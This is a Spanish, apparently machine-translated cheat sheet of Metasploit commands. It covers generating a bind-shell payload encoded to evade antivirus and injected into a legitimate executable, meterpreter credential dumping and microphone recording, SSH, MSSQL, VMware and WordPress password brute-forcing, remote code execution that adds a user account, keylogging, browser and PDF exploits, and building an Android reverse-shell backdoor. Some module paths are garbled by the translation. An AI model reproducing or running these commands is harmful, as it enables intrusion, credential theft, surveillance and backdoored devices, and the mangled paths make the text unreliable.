módulo de funciones técnicas
exploits: la acción de usar las vulnerabilidades del sistema para atacar, este módulo corresponde al método de ataque de cada vulnerabilidad específica
Carga útil: después de una explotación exitosa, el código o la instrucción que realmente se ejecuta en el sistema de destino
auxiliar: Módulos auxiliares que realizan funciones como recopilación de información, enumeración, detección de huellas digitales y escaneo
codificadores: módulos que cifran la carga útil y evitan la inspección AV
nops: mejore la estabilidad de la carga útil y mantenga el tamaño
Genera una explicación de la opción común:
-b elimina los caracteres incorrectos, por ejemplo: -b '\x00\xff'
-e configura el método de codificación, puede usar el comando show encoders para ver todos los métodos de codificación
-f formato de salida, si no está configurado, el valor predeterminado es el lenguaje ruby. Por ejemplo, -fc o -f exe
-i establece el número de codificaciones, generalmente se usa para evitar la codificación múltiple
-k mantiene el comportamiento de la plantilla de origen e inyecta la carga útil en un proceso como un hilo, a menudo se usa junto con -x -o
nombre del archivo de salida
-x define un archivo como plantilla
usar carga útil/windows/shell_bind_tcp
generar -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o 1.exe
comando meterpreter
fondo: volver pwd lpwd ls cat ejecutar: ejecutar programa getuid hashdump ps record_mic: grabar micrófono webcam_list: leer cámara
Módulo de escaneo de host: auxiliar/escáner/descubrimiento/arp_sweep
Módulo de escaneo de puertos: auxiliar/escáner/portscan/syn
Rastreo de contraseñas: use auxiliar/sniffer/psnuffle: admite la extracción de contraseñas de archivos de captura de pcap, actualmente solo admite los protocolos pop3, imap, ftp, http get.
Escaneo SNMP
usar auxiliar/escáner/snmp/snmp_login
usar auxiliar/escáner/snmp/snmp_enum
usar auxiliar/escáner/snmp/snmp_enumusers (ventanas)
usar auxiliar/escáner/snmp/snmp_enumshares (windows)aSASD//AS
Escaneo de versión SMB
usar auxiliar/escáner/smb/smb_version
Escanee la canalización con nombre para determinar el tipo de servicio SMB (contraseña de la cuenta)
usar auxiliar/escáner/smb/pipe_auditor
Busque servicios RCERPC accesibles a través de canalizaciones SMB
usar auxiliar/escáner/smb/pipe_dcerpc_auditor
Enumeración de recursos compartidos SMB (cuenta, contraseña)
usar auxiliar/escáner/smb/smb_enumshares
Enumeración de usuarios SMB (cuenta, contraseña)
usar auxiliar/escáner/smb/smb_enumusers
Enumeración SID (cuenta, contraseña)
usar auxiliar/escáner/smb/smb_lookupsid
Escaneo de versión SSH
usar auxiliar/escáner/ssh/ssh_version
Explosión de contraseñas SSH
usar auxiliar/escáner/ssh/ssh_login
Inicio de sesión de clave pública SSH
use auxiliar/escáner/ssh/ssh_login_pubkey
faltan parches para windows
use post/windows/gather/enum_patches
puerto de escaneo mssql
tcp1433 (puerto dinámico), udp1434 (número de puerto tcp de consulta)
usar auxiliar/escáner/mssql/mssql_ping
Explosión de contraseña mssql
usar auxiliar/escáner/mssql/mssql_login
ejecución remota de código
usar auxiliar/escáner/mssql/mssql_exec
establecer CMD usuario de red pase de usuario /ADD
escaneo de versión ftp
usar auxiliar/escáner/ftp/ftp_version
usar auxiliar/escáner/ftp/anónimo
usar auxiliar/escáner/ftp/ftp_login
Escaneo de vulnerabilidades
descifrado de contraseña vnc
usar auxiliar/escáner/vnc/vnc_login
acceso sin contraseña vnc
usar auxiliar/escáner/vnc/vnc_none_auth
Vulnerabilidad de escritorio remoto RDP
usar auxiliar/escáner/rdp/ms12_020_check
cheque no causa ataque dos
dispositivo de puerta trasera
usar auxiliar/escáner/ssh/juniper_backdoor
usar auxiliar/escáner/ssh/fortinet_backdoor
Explosión de contraseñas de VMware ESXI
use auxiliar/escáner/vmware/vmauthd_login
usar auxiliar/escáner/vmware/vmware_enum_vms
Uso de la API WEB
use auxiliar/admin/vmware/poweron_vm
escaneo de vulnerabilidad http
Certificados caducados: utilice auxiliar/escáner/http/cert
Mostrar directorios y archivos: utilice auxiliar/escáner/http/dir_listing
usar auxiliar/escáner/http/files_dir
omisión de identidad de codificación webdav unicode: utilice auxiliar/escáner/http/dir_webdav_unicode_bypass
Inicio de sesión de administración de Tomcat: utilice auxiliar/escáner/http/tomcat_mgr_login
Omisión de autenticación basada en el método http: utilice auxiliar/escáner/http/verb_auth_bypass
Explosión de contraseñas de WordPress: utilice auxiliar/escáner/http/wordpress_login_enum
establecer URI/wordpress/wp-login.php
Ejecutar carga útil utilizando la vulnerabilidad de Acrobat Reader
Construya archivos PDF: exploit/windows/fileformat/adobe_utilprintf
Construya un sitio web malicioso: exploit/windows/browser/adobe_utilprintf
Meterpreter
uso privado
ejecutar post/windows/capture/keylog_recorder
Ejecute la carga útil explotando la vulnerabilidad del complemento flash
use exploit/multi/navegador/adobe_flash_hacking_team_uaf
use exploit/multi/navegador/adobe_flash_opaque_background_uaf
usar auxiliar/servidor/navegador_autopwn2
Ejecutar carga útil utilizando la vulnerabilidad del navegador IE
use exploit/windows/browser/ms14_064_ole_code_execution (windowsxp)
Ejecutar carga útil usando vulnerabilidad JRE
use exploit/multi/navegador/java_jre17_driver_manager
use exploit/multi/navegador/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types
Generar programa de puerta trasera de Android
use la carga útil/android/meterpreter/reverse_tcp
generar -f a.apk -p android -t raw